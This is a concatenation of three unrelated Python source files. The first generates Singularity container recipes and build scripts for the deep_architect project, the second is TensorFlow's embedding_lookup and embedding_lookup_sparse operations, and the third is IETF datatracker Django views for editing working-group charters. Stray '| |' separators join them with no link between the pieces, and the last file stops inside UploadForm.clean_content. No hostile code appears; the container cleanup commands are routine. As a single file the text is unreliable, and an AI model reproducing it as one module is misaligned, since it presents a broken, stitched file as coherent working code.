extra_py_packages = [
    # for documentation.
    'sphinx',
    'sphinx_rtd_theme',
    # # for dash visualizations (update later).
    # 'dash==0.21.0',
    # 'dash-renderer==0.12.1',
    # 'dash-html-components==0.10.0',
    # 'dash-core-components==0.22.1',
    # 'plotly --upgrade',
    # for multi-machine support.
    'mpi4py',
]

### NOTE: this is not fully tested
# Extra shell commands run in the recipe's %post section before installs;
# all entries are currently disabled.
extra_bash_commands = [
    # 'apt-get update'
    # # for one of max's examples ; this is not fully tested.
    # '$PIP_INSTALL pathlib tqdm tables',
    # '$APT_INSTALL software-properties-common',
    # 'add-apt-repository ppa:ubuntugis/ppa',
    # 'apt-get update',
    # '$APT_INSTALL gdal-bin libgdal-dev',
    # '$PIP_INSTALL shapely[vectorized] rasterio',
]

# Extra apt packages installed into every container flavor.
extra_apt_packages = [
    'pandoc'
    # 'software-properties-common'
]
def create_singularity_container(config_d, out_folderpath):
    """Write a Singularity recipe and a build script for one container flavor.

    Produces `out_folderpath/Singularity` (the recipe) and
    `out_folderpath/build.sh`, which sudo-builds the sandbox image into
    `out_folderpath/deep_architect.img`.
    """
    header_lines = [
        'Bootstrap: docker',
        'From: docker://ufoym/deepo:%s' % config_d['tag'],
    ]
    help_lines = [
        '%help',
        'This container contains the development environment for deep_architect.',
        'You should be able to run all the examples, generate documentation,',
        'and generate visualizations with it.',
    ]
    post_lines = [
        '%post',
        ' PIP_INSTALL="python -m pip --no-cache-dir install --upgrade"',
        ' APT_INSTALL="apt-get install -y --no-install-recommends"',
        ' apt-get update'
    ]
    if config_d["key"][1] == 'gpu':
        # necessary for the --nv flag in some cases.
        post_lines.append(' echo > /bin/nvidia-smi')
    # Shared extras first, then the per-flavor extras from the config.
    for cmd in extra_bash_commands + config_d['extra_bash_commands']:
        post_lines.append(' %s' % cmd)
    for pkg in extra_apt_packages + config_d['extra_apt_packages']:
        post_lines.append(' $APT_INSTALL %s' % pkg)
    for pkg in extra_py_packages + config_d['extra_py_packages']:
        post_lines.append(' $PIP_INSTALL %s' % pkg)
    post_lines.extend([
        # cleanup lines
        ' ldconfig && \\',
        ' apt-get clean && \\',
        ' apt-get autoremove && \\',
        ' rm -rf /var/lib/apt/lists/* /tmp/* ~/*',
    ])
    runscript_lines = [
        '%runscript',
        ' export PYTHONPATH=".:$PYTHONPATH" && exec python "$@"'
    ]
    # Assemble the recipe, separating sections with blank lines.
    lines = []
    for lst in [header_lines, help_lines, post_lines, runscript_lines]:
        lines.extend(lst)
        lines.append('')
    recipe_filepath = join_paths([out_folderpath, 'Singularity'])
    write_textfile(recipe_filepath, lines)
    # script for creating the container.
    container_filepath = join_paths([out_folderpath, 'deep_architect.img'])
    create_bash_script([
        'sudo singularity build --sandbox %s %s' %
        (container_filepath, recipe_filepath)
    ], join_paths([out_folderpath, 'build.sh']))
# TODO: create the equivalent docker containers.
def create_docker_container(config_d, recipe_filepath):
    """Placeholder for generating the equivalent Docker containers (see TODO above)."""
    raise NotImplementedError
# TODO: change to a make file later.
def create_build_all_script(out_folderpath, folderpath_lst):
    """Write a build.sh in *out_folderpath* that invokes every per-container build.sh in order."""
    create_bash_script(['./%s/build.sh' % path for path in folderpath_lst],
                       join_paths([out_folderpath, 'build.sh']))
def create_makefile(out_folderpath, container_config_lst):
    """Create per-category build scripts (build_all.sh, build_py27.sh,
    build_gpu.sh, ...) plus a clean.sh that removes all built images.

    Despite the name, this emits bash scripts rather than an actual
    Makefile (see the module-level TODO).
    """
    # Factory for an empty per-rule accumulator.
    fn = lambda rule_name: {
        'rule_name': rule_name,
        'target_lst': [],
        'command_lst': []
    }
    rule_name_to_config = {
        'py27': fn('py27'),
        'py36': fn('py36'),
        'cpu': fn('cpu'),
        'gpu': fn('gpu'),
        'all': fn('all')
    }

    def add_to_lists(cfg):
        # Each container contributes to 'all' plus its python and device rules.
        lst = [rule_name_to_config['all']]
        lst.append(rule_name_to_config['py27' if cfg['is_py27'] else 'py36'])
        lst.append(rule_name_to_config['gpu' if cfg['is_gpu'] else 'cpu'])
        for x in lst:
            x['target_lst'].append(cfg['target'])
            x['command_lst'].append(cfg['command'])

    for cfg in container_config_lst:
        assert cfg['is_singularity']  # only for singularity for now.
        cfg['target'] = join_paths([cfg['folderpath'], 'deep_architect.img'])
        cfg['command'] = join_paths(
            ['./%s' % join_paths([cfg['folderpath'], 'build.sh'])])
        add_to_lists(cfg)
    # create scripts for all commands.
    for k, d in rule_name_to_config.items():
        create_bash_script(d['command_lst'],
                           join_paths([out_folderpath,
                                       'build_%s.sh' % k]))
    create_bash_script(
        ['rm %s' % t for t in rule_name_to_config['all']['target_lst']],
        join_paths([out_folderpath, 'clean.sh']))
def main():
    """Generate Singularity recipes and build scripts for all four container
    flavors (py27/py36 x cpu/gpu), plus the aggregate build scripts."""
    container_folderpath_lst = []
    container_config_lst = []
    for is_py27 in [False, True]:
        for is_gpu in [False, True]:
            key, config_d = get_config(is_py27, is_gpu)
            # e.g. containers/singularity/deep_architect-py36-cpu
            out_folderpath = join_paths([
                'containers', 'singularity',
                '-'.join(['deep_architect'] + list(key))
            ])
            create_folder(
                out_folderpath,
                abort_if_exists=False,
                create_parent_folders=True)
            create_singularity_container(config_d, out_folderpath)
            container_folderpath_lst.append(out_folderpath)
            container_config_lst.append({
                'folderpath': out_folderpath,
                'is_singularity': True,
                'is_py27': is_py27,
                'is_gpu': is_gpu
            })
    create_build_all_script('containers', container_folderpath_lst)
    create_makefile('containers', container_config_lst)


if __name__ == '__main__':
    main()
# TODO: do the generation of the Docker containers. Should be similar to the singularity ones.
# TODO: add a file to create all the containers at once.
# NOTE: the makefile is not fully correct.
| |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Operations for embeddings."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
def embedding_lookup(params, ids, partition_strategy="mod", name=None,
                     validate_indices=True):
  """Looks up `ids` in a list of embedding tensors.

  This function is used to perform parallel lookups on the list of
  tensors in `params`. It is a generalization of
  [`tf.gather()`](../../api_docs/python/array_ops.md#gather), where `params` is
  interpreted as a partition of a larger embedding tensor.

  If `len(params) > 1`, each element `id` of `ids` is partitioned between
  the elements of `params` according to the `partition_strategy`.
  In all strategies, if the id space does not evenly divide the number of
  partitions, each of the first `(max_id + 1) % len(params)` partitions will
  be assigned one more id.

  If `partition_strategy` is `"mod"`, we assign each id to partition
  `p = id % len(params)`. For instance,
  13 ids are split across 5 partitions as:
  `[[0, 5, 10], [1, 6, 11], [2, 7, 12], [3, 8], [4, 9]]`

  If `partition_strategy` is `"div"`, we assign ids to partitions in a
  contiguous manner. In this case, 13 ids are split across 5 partitions as:
  `[[0, 1, 2], [3, 4, 5], [6, 7, 8], [9, 10], [11, 12]]`

  The results of the lookup are concatenated into a dense
  tensor. The returned tensor has shape `shape(ids) + shape(params)[1:]`.

  Args:
    params: A list of tensors with the same type and which can be concatenated
      along dimension 0. Each `Tensor` must be appropriately sized for the given
      `partition_strategy`.
    ids: A `Tensor` with type `int32` or `int64` containing the ids to be looked
      up in `params`.
    partition_strategy: A string specifying the partitioning strategy, relevant
      if `len(params) > 1`. Currently `"div"` and `"mod"` are supported. Default
      is `"mod"`.
    name: A name for the operation (optional).
    validate_indices: Whether or not to validate gather indices.

  Returns:
    A `Tensor` with the same type as the tensors in `params`.

  Raises:
    ValueError: If `params` is empty.
  """
  if params is None or params == []:  # pylint: disable=g-explicit-bool-comparison
    raise ValueError("Need at least one param")
  if not isinstance(params, list):
    params = [params]
  with ops.op_scope(params + [ids], name, "embedding_lookup") as name:
    np = len(params)  # Number of partitions
    params = ops.convert_n_to_tensor_or_indexed_slices(params, name="params")
    if np == 1:
      # Single partition: a plain gather, colocated with the embedding table.
      with ops.colocate_with(params[0]):
        return array_ops.gather(params[0], ids, name=name,
                                validate_indices=validate_indices)
    else:
      # Multiple partitions: flatten ids, route each id to its partition,
      # gather per partition, then stitch results back into the original
      # order and reshape to shape(ids) + embedding shape.
      ids = ops.convert_to_tensor(ids, name="ids")
      flat_ids = array_ops.reshape(ids, [-1])
      original_indices = math_ops.range(array_ops.size(flat_ids))
      # Create p_assignments and set new_ids depending on the strategy.
      if partition_strategy == "mod":
        p_assignments = flat_ids % np
        new_ids = flat_ids // np
      elif partition_strategy == "div":
        # Compute num_total_ids as the sum of dim-0 of params, then assign to
        # partitions based on a constant number of ids per partition. Optimize
        # if we already know the full shape statically.
        dim_0_size = params[0].get_shape()[0]
        for p in xrange(1, np):
          dim_0_size += params[p].get_shape()[0]
        if dim_0_size.value:
          num_total_ids = constant_op.constant(dim_0_size.value, flat_ids.dtype)
        else:
          # Static shape unknown for at least one partition: fall back to a
          # runtime sum of the partition sizes.
          dim_0_sizes = []
          for p in xrange(np):
            if params[p].get_shape()[0].value is not None:
              dim_0_sizes.append(params[p].get_shape()[0].value)
            else:
              with ops.colocate_with(params[p]):
                dim_0_sizes.append(array_ops.shape(params[p])[0])
          num_total_ids = math_ops.reduce_sum(
              math_ops.cast(array_ops.pack(dim_0_sizes), flat_ids.dtype))
        ids_per_partition = num_total_ids // np
        extras = num_total_ids % np
        # The first `extras` partitions hold one extra id each.
        p_assignments = math_ops.maximum(
            flat_ids // (ids_per_partition + 1),
            (flat_ids - extras) // ids_per_partition)
        # Emulate a conditional using a boolean indicator tensor
        is_in_first_extras_partitions = math_ops.cast(
            p_assignments < extras, flat_ids.dtype)
        new_ids = (
            is_in_first_extras_partitions * (
                flat_ids % (ids_per_partition + 1)) +
            (1 - is_in_first_extras_partitions) * (
                (flat_ids - extras) % ids_per_partition))
      else:
        raise ValueError("Unrecognized partition strategy: " +
                         partition_strategy)

      # Cast partition assignments to int32 for use in dynamic_partition.
      # There really should not be more than 2^32 partitions.
      p_assignments = math_ops.cast(p_assignments, dtypes.int32)
      # Partition list of ids based on assignments into np separate lists
      gather_ids = data_flow_ops.dynamic_partition(new_ids, p_assignments, np)
      # Similarly, partition the original indices.
      pindices = data_flow_ops.dynamic_partition(original_indices,
                                                 p_assignments, np)
      # Do np separate lookups, finding embeddings for plist[p] in params[p]
      partitioned_result = []
      for p in xrange(np):
        with ops.colocate_with(params[p]):
          partitioned_result.append(array_ops.gather(
              params[p], gather_ids[p],
              validate_indices=validate_indices))
      # Stitch these back together
      ret = data_flow_ops.dynamic_stitch(pindices, partitioned_result,
                                         name=name)
      # Reshape to reverse the flattening of ids.
      element_shape = params[0].get_shape()[1:]
      for p in params[1:]:
        element_shape = element_shape.merge_with(p.get_shape()[1:])
      if element_shape.is_fully_defined():
        ret = array_ops.reshape(ret, array_ops.concat(0, [
            array_ops.shape(ids), element_shape]))
      else:
        # It's important that we compute params[0].shape on the right device
        # to avoid data motion.
        with ops.colocate_with(params[0]):
          params_shape = array_ops.shape(params[0])
        ret = array_ops.reshape(ret, array_ops.concat(0, [
            array_ops.shape(ids), array_ops.slice(params_shape, [1], [-1])]))
      # output shape = ids.shape + params[*].shape[1:]
      # Normally the reshape is sufficient, but setting shape explicitly
      # teaches shape inference that params[1:].get_shape() matters.
      ret.set_shape(ids.get_shape().concatenate(element_shape))
      return ret
def embedding_lookup_sparse(params, sp_ids, sp_weights,
                            partition_strategy="mod",
                            name=None,
                            combiner="mean"):
  """Computes embeddings for the given ids and weights.

  This op assumes that there is at least one id for each row in the dense tensor
  represented by sp_ids (i.e. there are no rows with empty features), and that
  all the indices of sp_ids are in canonical row-major order.

  It also assumes that all id values lie in the range [0, p0), where p0
  is the sum of the size of params along dimension 0.

  Args:
    params: A single tensor representing the complete embedding tensor,
      or a list of P tensors all of same shape except for the first dimension,
      representing sharded embedding tensors.
    sp_ids: N x M SparseTensor of int64 ids (typically from FeatureValueToId),
      where N is typically batch size and M is arbitrary.
    sp_weights: either a SparseTensor of float / double weights, or None to
      indicate all weights should be taken to be 1. If specified, sp_weights
      must have exactly the same shape and indices as sp_ids.
    partition_strategy: A string specifying the partitioning strategy, relevant
      if `len(params) > 1`. Currently `"div"` and `"mod"` are supported. Default
      is `"mod"`. See `tf.nn.embedding_lookup` for more details.
    name: Optional name for the op.
    combiner: A string specifying the reduction op. Currently "mean", "sqrtn"
      and "sum" are supported.
      "sum" computes the weighted sum of the embedding results for each row.
      "mean" is the weighted sum divided by the total weight.
      "sqrtn" is the weighted sum divided by the square root of the sum of the
      squares of the weights.

  Returns:
    A dense tensor representing the combined embeddings for the
    sparse ids. For each row in the dense tensor represented by sp_ids, the op
    looks up the embeddings for all ids in that row, multiplies them by the
    corresponding weight, and combines these embeddings as specified.

    In other words, if
      shape(combined params) = [p0, p1, ..., pm]
    and
      shape(sp_ids) = shape(sp_weights) = [d0, d1, ..., dn]
    then
      shape(output) = [d0, d1, ..., dn-1, p1, ..., pm].

    For instance, if params is a 10x20 matrix, and sp_ids / sp_weights are

      [0, 0]: id 1, weight 2.0
      [0, 1]: id 3, weight 0.5
      [1, 0]: id 0, weight 1.0
      [2, 3]: id 1, weight 3.0

    with combiner="mean", then the output will be a 3x20 matrix where
      output[0, :] = (params[1, :] * 2.0 + params[3, :] * 0.5) / (2.0 + 0.5)
      output[1, :] = params[0, :] * 1.0
      output[2, :] = params[1, :] * 3.0

  Raises:
    TypeError: If sp_ids is not a SparseTensor, or if sp_weights is neither
      None nor SparseTensor.
    ValueError: If combiner is not one of {"mean", "sqrtn", "sum"}.
  """
  if combiner not in ("mean", "sqrtn", "sum"):
    raise ValueError("combiner must be one of 'mean', 'sqrtn' or 'sum'")
  if not isinstance(params, list):
    params = [params]
  if not isinstance(sp_ids, ops.SparseTensor):
    raise TypeError("sp_ids must be SparseTensor")
  ignore_weights = sp_weights is None
  if not ignore_weights:
    if not isinstance(sp_weights, ops.SparseTensor):
      raise TypeError("sp_weights must be either None or SparseTensor")
    # Statically check that weights line up with ids element-for-element.
    sp_ids.values.get_shape().assert_is_compatible_with(
        sp_weights.values.get_shape())
    sp_ids.indices.get_shape().assert_is_compatible_with(
        sp_weights.indices.get_shape())
    sp_ids.shape.get_shape().assert_is_compatible_with(
        sp_weights.shape.get_shape())
    # TODO(yleon): Add enhanced node assertions to verify that sp_ids and
    # sp_weights have equal indices and shapes.

  with ops.op_scope(params + [sp_ids], name, "embedding_lookup_sparse") as name:
    # The first index column identifies the output row each id belongs to.
    segment_ids = sp_ids.indices[:, 0]
    if segment_ids.dtype != dtypes.int32:
      segment_ids = math_ops.cast(segment_ids, dtypes.int32)

    ids = sp_ids.values
    if ignore_weights:
      # Unweighted case: deduplicate ids before the lookup; `idx` maps each
      # original position back to its unique id for the sparse_segment_* ops.
      ids, idx = array_ops.unique(ids)
    else:
      idx = None
    embeddings = embedding_lookup(
        params, ids, partition_strategy=partition_strategy)
    if not ignore_weights:
      weights = sp_weights.values
      if weights.dtype != embeddings.dtype:
        weights = math_ops.cast(weights, embeddings.dtype)

      # Reshape weights to allow broadcast
      ones = array_ops.fill(
          array_ops.expand_dims(array_ops.rank(embeddings) - 1, 0), 1)
      bcast_weights_shape = array_ops.concat(0, [
          array_ops.shape(weights), ones])

      orig_weights_shape = weights.get_shape()
      weights = array_ops.reshape(weights, bcast_weights_shape)

      # Set the weight shape, since after reshaping to bcast_weights_shape,
      # the shape becomes None.
      if embeddings.get_shape().ndims is not None:
        weights.set_shape(orig_weights_shape.concatenate(
            [1 for _ in range(embeddings.get_shape().ndims - 1)]))

      embeddings *= weights

      if combiner == "sum":
        embeddings = math_ops.segment_sum(embeddings, segment_ids, name=name)
      elif combiner == "mean":
        embeddings = math_ops.segment_sum(embeddings, segment_ids)
        weight_sum = math_ops.segment_sum(weights, segment_ids)
        embeddings = math_ops.div(embeddings, weight_sum, name=name)
      elif combiner == "sqrtn":
        embeddings = math_ops.segment_sum(embeddings, segment_ids)
        weights_squared = math_ops.pow(weights, 2)
        weight_sum = math_ops.segment_sum(weights_squared, segment_ids)
        weight_sum_sqrt = math_ops.sqrt(weight_sum)
        embeddings = math_ops.div(embeddings, weight_sum_sqrt, name=name)
      else:
        assert False, "Unrecognized combiner"
    else:
      # Unweighted case: use the fused sparse_segment_* reductions, which
      # consume the unique-id mapping computed above.
      assert idx is not None
      if combiner == "sum":
        embeddings = math_ops.sparse_segment_sum(embeddings, idx, segment_ids,
                                                 name=name)
      elif combiner == "mean":
        embeddings = math_ops.sparse_segment_mean(embeddings, idx, segment_ids,
                                                  name=name)
      elif combiner == "sqrtn":
        embeddings = math_ops.sparse_segment_sqrt_n(embeddings, idx,
                                                    segment_ids, name=name)
      else:
        assert False, "Unrecognized combiner"

    return embeddings
| |
import re, os, string, datetime, shutil, textwrap
from django.http import HttpResponse, HttpResponseRedirect, HttpResponseNotFound, Http404
from django.shortcuts import render_to_response, get_object_or_404, redirect
from django.template.loader import render_to_string
from django.core.urlresolvers import reverse as urlreverse
from django.core.urlresolvers import reverse
from django.template import RequestContext
from django import forms
from django.forms.util import ErrorList
from django.utils import simplejson
from django.utils.html import strip_tags, escape
from django.utils.safestring import mark_safe
from django.conf import settings
from django.contrib import messages
from ietf.utils.mail import send_mail_preformatted
from ietf.utils.textupload import get_cleaned_text_file_content
from ietf.utils.history import find_history_active_at
from ietf.ietfauth.decorators import has_role, role_required
from ietf.iesg.models import TelechatDate
from ietf.doc.models import *
from ietf.doc.utils import *
from ietf.name.models import *
from ietf.person.models import *
from ietf.group.models import *
from ietf.group.utils import save_group_in_history, save_milestone_in_history
from ietf.wgcharter.mails import *
from ietf.wgcharter.utils import *
import debug
class ChangeStateForm(forms.Form):
    """Form for changing the state of a charter document.

    The ``hide`` keyword argument accepts an iterable of field names
    whose widgets are replaced by hidden inputs, so the same form can
    serve the initcharter/recharter/abandon flows with fewer visible
    fields.
    """
    charter_state = forms.ModelChoiceField(State.objects.filter(used=True, type="charter", slug__in=["infrev", "intrev", "extrev", "iesgrev"]), label="Charter state", empty_label=None, required=False)
    initial_time = forms.IntegerField(initial=0, label="Review time", help_text="(in weeks)", required=False)
    message = forms.CharField(widget=forms.Textarea, help_text="Leave blank to change state without notifying the Secretariat", required=False, label=mark_safe("Message to<br> Secretariat"))
    comment = forms.CharField(widget=forms.Textarea, help_text="Optional comment for the charter history", required=False)

    def __init__(self, *args, **kwargs):
        self.hide = kwargs.pop('hide', None)
        super(ChangeStateForm, self).__init__(*args, **kwargs)
        # hide requested fields
        if self.hide:
            for f in self.hide:
                # assign a widget *instance*: assigning the bare
                # forms.HiddenInput class leaves an uninstantiated
                # widget that cannot be rendered
                self.fields[f].widget = forms.HiddenInput()
@role_required("Area Director", "Secretariat")
def change_state(request, name, option=None):
    """Change state of charter, notifying parties as necessary and
    logging the change as a comment.

    *option* selects a special flow: "initcharter"/"recharter" force the
    infrev state and bump the revision, "abandon" either marks the group
    abandoned (pre-WG states) or rolls the charter back to approved.
    With no option, the state comes from the submitted form.
    """
    charter = get_object_or_404(Document, type="charter", name=name)
    group = charter.group
    chartering_type = get_chartering_type(charter)

    # an initial-review event is only relevant while the charter is in
    # infrev, has not expired, and this is not a rechartering
    initial_review = charter.latest_event(InitialReviewDocEvent, type="initial_review")
    if charter.get_state_slug() != "infrev" or (initial_review and initial_review.expires < datetime.datetime.now()) or chartering_type == "rechartering":
        initial_review = None

    login = request.user.get_profile()

    if request.method == 'POST':
        form = ChangeStateForm(request.POST)
        if form.is_valid():
            clean = form.cleaned_data
            charter_rev = charter.rev

            if option in ("initcharter", "recharter"):
                charter_state = State.objects.get(used=True, type="charter", slug="infrev")
                # make sure we have the latest revision set, if we
                # abandoned a charter before, we could have reset the
                # revision to latest approved
                prev_revs = charter.history_set.order_by('-rev')[:1]
                if prev_revs and prev_revs[0].rev > charter_rev:
                    charter_rev = prev_revs[0].rev

                # a plain approved rev (no "-NN" suffix) starts a new
                # draft cycle at -00
                if "-" not in charter_rev:
                    charter_rev = charter_rev + "-00"
            elif option == "abandon":
                oldstate = group.state
                if oldstate.slug in ("proposed", "bof", "unknown"):
                    # group never got chartered: mark charter not
                    # currently under review and the group abandoned
                    charter_state = State.objects.get(used=True, type="charter", slug="notrev")
                    #TODO : set an abandoned state and leave some comments here
                    group.state = GroupStateName.objects.get(slug='abandon')
                    group.save()
                    e = ChangeStateGroupEvent(group=group, type="changed_state")
                    e.time = group.time
                    e.by = login
                    e.state_id = group.state.slug
                    e.desc = "Group state changed to %s from %s" % (group.state, oldstate)
                    e.save()
                else:
                    # abandoning a recharter: fall back to the approved
                    # charter and its revision
                    charter_state = State.objects.get(used=True, type="charter", slug="approved")
                    charter_rev = approved_revision(charter.rev)
            else:
                charter_state = clean['charter_state']

            comment = clean['comment'].rstrip()
            message = clean['message']

            if charter_state != charter.get_state():
                # Charter state changed
                save_document_in_history(charter)

                prev = charter.get_state()
                charter.set_state(charter_state)
                charter.rev = charter_rev

                if option != "abandon":
                    log_state_changed(request, charter, login, prev)
                else:
                    # kill hanging ballots
                    close_open_ballots(charter, login)
                    # Special log for abandoned efforts
                    e = DocEvent(type="changed_document", doc=charter, by=login)
                    e.desc = "IESG has abandoned the chartering effort"
                    e.save()

                if comment:
                    c = DocEvent(type="added_comment", doc=charter, by=login)
                    c.desc = comment
                    c.save()

                charter.time = datetime.datetime.now()
                charter.save()

                if message:
                    email_secretariat(request, group, "state-%s" % charter_state.slug, message)
                email_state_changed(request, charter, "State changed to %s." % charter_state)

                if charter_state.slug == "intrev":
                    # internal review: open the review ballot and seed
                    # the default announcement texts
                    if request.POST.get("ballot_wo_extern"):
                        create_ballot_if_not_open(charter, login, "r-wo-ext")
                    else:
                        create_ballot_if_not_open(charter, login, "r-extrev")
                    default_review_text(group, charter, login)
                    default_action_text(group, charter, login)
                elif charter_state.slug == "iesgrev":
                    create_ballot_if_not_open(charter, login, "approve")

            # record a review deadline when entering informal review
            if charter_state.slug == "infrev" and clean["initial_time"] and clean["initial_time"] != 0:
                e = InitialReviewDocEvent(type="initial_review", by=login, doc=charter)
                e.expires = datetime.datetime.now() + datetime.timedelta(weeks=clean["initial_time"])
                e.desc = "Initial review time expires %s" % e.expires.strftime("%Y-%m-%d")
                e.save()

            return redirect('doc_view', name=charter.name)
    else:
        # GET: prefill and hide fields according to the selected flow
        if option == "recharter":
            hide = ['initial_time', 'charter_state', 'message']
            init = dict()
        elif option == "initcharter":
            hide = ['charter_state']
            init = dict(initial_time=1, message='%s has initiated chartering of the proposed %s:\n "%s" (%s).' % (login.plain_name(), group.type.name, group.name, group.acronym))
        elif option == "abandon":
            hide = ['initial_time', 'charter_state']
            init = dict(message='%s has abandoned the chartering effort on the %s:\n "%s" (%s).' % (login.plain_name(), group.type.name, group.name, group.acronym))
        else:
            hide = ['initial_time']
            s = charter.get_state()
            init = dict(charter_state=s.pk if s else None)
        form = ChangeStateForm(hide=hide, initial=init)

    # most recent state the charter held before the current one, for display
    prev_charter_state = None
    charter_hists = DocHistory.objects.filter(doc=charter).exclude(states__type="charter", states__slug=charter.get_state_slug()).order_by("-time")[:1]
    if charter_hists:
        prev_charter_state = charter_hists[0].get_state()

    title = {
        "initcharter": "Initiate chartering of %s %s" % (group.acronym, group.type.name),
        "recharter": "Recharter %s %s" % (group.acronym, group.type.name),
        "abandon": "Abandon effort on %s %s" % (group.acronym, group.type.name),
        }.get(option)
    if not title:
        title = "Change chartering state of %s %s" % (group.acronym, group.type.name)

    def state_pk(slug):
        # helper: pk of a charter state by slug, for the JS hints below
        return State.objects.get(used=True, type="charter", slug=slug).pk

    # per-target-state informational messages shown client-side
    info_msg = {
        state_pk("infrev"): 'The %s "%s" (%s) has been set to Informal IESG review by %s.' % (group.type.name, group.name, group.acronym, login.plain_name()),
        state_pk("intrev"): 'The %s "%s" (%s) has been set to Internal review by %s.\nPlease place it on the next IESG telechat and inform the IAB.' % (group.type.name, group.name, group.acronym, login.plain_name()),
        state_pk("extrev"): 'The %s "%s" (%s) has been set to External review by %s.\nPlease send out the external review announcement to the appropriate lists.\n\nSend the announcement to other SDOs: Yes\nAdditional recipients of the announcement: ' % (group.type.name, group.name, group.acronym, login.plain_name()),
        }

    states_for_ballot_wo_extern = State.objects.filter(used=True, type="charter", slug="intrev").values_list("pk", flat=True)

    return render_to_response('wgcharter/change_state.html',
                              dict(form=form,
                                   doc=group.charter,
                                   login=login,
                                   option=option,
                                   prev_charter_state=prev_charter_state,
                                   title=title,
                                   initial_review=initial_review,
                                   chartering_type=chartering_type,
                                   info_msg=simplejson.dumps(info_msg),
                                   states_for_ballot_wo_extern=simplejson.dumps(list(states_for_ballot_wo_extern)),
                                   ),
                              context_instance=RequestContext(request))
class TelechatForm(forms.Form):
    """Form for scheduling a charter on an IESG telechat.

    Requires an ``initial`` keyword argument with a "telechat_date"
    entry (possibly None); a currently scheduled date that is no longer
    an active TelechatDate is kept selectable so it is not silently
    dropped.
    """
    telechat_date = forms.TypedChoiceField(coerce=lambda x: datetime.datetime.strptime(x, '%Y-%m-%d').date(), empty_value=None, required=False)

    def __init__(self, *args, **kwargs):
        # name the class explicitly: super(self.__class__, self) would
        # recurse infinitely if this form were ever subclassed
        super(TelechatForm, self).__init__(*args, **kwargs)
        dates = [d.date for d in TelechatDate.objects.active().order_by('date')]
        init = kwargs['initial'].get("telechat_date")
        if init and init not in dates:
            dates.insert(0, init)
        self.fields['telechat_date'].choices = [("", "(not on agenda)")] + [(d, d.strftime("%Y-%m-%d")) for d in dates]
@role_required("Area Director", "Secretariat")
def telechat_date(request, name):
    """Edit the IESG telechat date a charter is scheduled for."""
    doc = get_object_or_404(Document, type="charter", name=name)
    login = request.user.get_profile()

    # seed the form with the currently scheduled date, if any
    scheduled = doc.latest_event(TelechatDocEvent, type="scheduled_for_telechat")
    initial = {"telechat_date": scheduled.telechat_date if scheduled else None}

    if request.method == "POST":
        form = TelechatForm(request.POST, initial=initial)
        if form.is_valid():
            update_telechat(request, doc, login, form.cleaned_data['telechat_date'])
            return redirect("doc_view", name=doc.name)
    else:
        form = TelechatForm(initial=initial)

    return render_to_response('wgcharter/edit_telechat_date.html',
                              dict(doc=doc,
                                   form=form,
                                   user=request.user,
                                   login=login,
                                   okstates=['intrev','extrev','iesgrev'],
                                   ),
                              context_instance=RequestContext(request))
class NotifyForm(forms.Form):
    """Edit the comma-separated list of state-notification recipients."""
    notify = forms.CharField(max_length=255, help_text="List of email addresses to receive state notifications, separated by comma", label="Notification list", required=False)

    def clean_notify(self):
        # drop surrounding whitespace from the submitted address list
        return self.cleaned_data["notify"].strip()
@role_required("Area Director", "Secretariat")
def edit_notify(request, name):
    """Edit the state-notification address list of a charter document."""
    doc = get_object_or_404(Document, type="charter", name=name)
    login = request.user.get_profile()

    form_initial = {'notify': doc.notify}
    if request.method == "POST":
        form = NotifyForm(request.POST, initial=form_initial)
        if form.is_valid():
            new_notify = form.cleaned_data["notify"]
            if new_notify != doc.notify:
                # snapshot the document, then record the change as an event
                save_document_in_history(doc)
                event = DocEvent(doc=doc, by=login)
                event.desc = "Notification list changed to %s" % (escape(new_notify) or "none")
                if doc.notify:
                    event.desc += " from %s" % escape(doc.notify)
                event.type = "changed_document"
                event.save()
                doc.notify = new_notify
                doc.time = event.time
                doc.save()
            return redirect("doc_view", name=doc.name)
    else:
        form = NotifyForm(initial=form_initial)

    return render_to_response('wgcharter/edit_notify.html',
                              dict(doc=doc,
                                   form=form,
                                   user=request.user,
                                   login=login),
                              context_instance=RequestContext(request))
class AdForm(forms.Form):
    """Select the responsible Area Director for a charter."""
    ad = forms.ModelChoiceField(Person.objects.filter(role__name="ad", role__group__state="active").order_by('name'),
                                label="Responsible AD", empty_label="(None)", required=True)

    def __init__(self, *args, **kwargs):
        # name the class explicitly: super(self.__class__, self) would
        # recurse infinitely if this form were ever subclassed
        super(AdForm, self).__init__(*args, **kwargs)

        # if previous AD is now ex-AD, append that person to the list
        ad_pk = self.initial.get('ad')
        choices = self.fields['ad'].choices
        if ad_pk and ad_pk not in [pk for pk, name in choices]:
            self.fields['ad'].choices = list(choices) + [("", "-------"), (ad_pk, Person.objects.get(pk=ad_pk).plain_name())]
@role_required("Area Director", "Secretariat")
def edit_ad(request, name):
    """Change the responsible Area Director for this charter."""
    charter = get_object_or_404(Document, type="charter", name=name)
    login = request.user.get_profile()

    if request.method == 'POST':
        form = AdForm(request.POST)
        if form.is_valid():
            new_ad = form.cleaned_data['ad']
            if new_ad != charter.ad:
                # snapshot the document, then record the change as an event
                save_document_in_history(charter)
                event = DocEvent(doc=charter, by=login)
                event.desc = "Responsible AD changed to %s" % new_ad.plain_name()
                if charter.ad:
                    event.desc += " from %s" % charter.ad.plain_name()
                event.type = "changed_document"
                event.save()
                charter.ad = new_ad
                charter.time = event.time
                charter.save()
            return HttpResponseRedirect(reverse('doc_view', kwargs={'name': charter.name}))
    else:
        form = AdForm(initial={"ad": charter.ad_id})

    return render_to_response('wgcharter/change_ad.html',
                              {'form': form,
                               'charter': charter,
                               },
                              context_instance=RequestContext(request))
class UploadForm(forms.Form):
    """Accept new charter text, pasted inline or uploaded as a .txt file."""
    content = forms.CharField(widget=forms.Textarea, label="Charter text", help_text="Edit the charter text", required=False)
    txt = forms.FileField(label=".txt format", help_text="Or upload a .txt file", required=False)

    def clean_content(self):
        # normalize line endings submitted by the browser
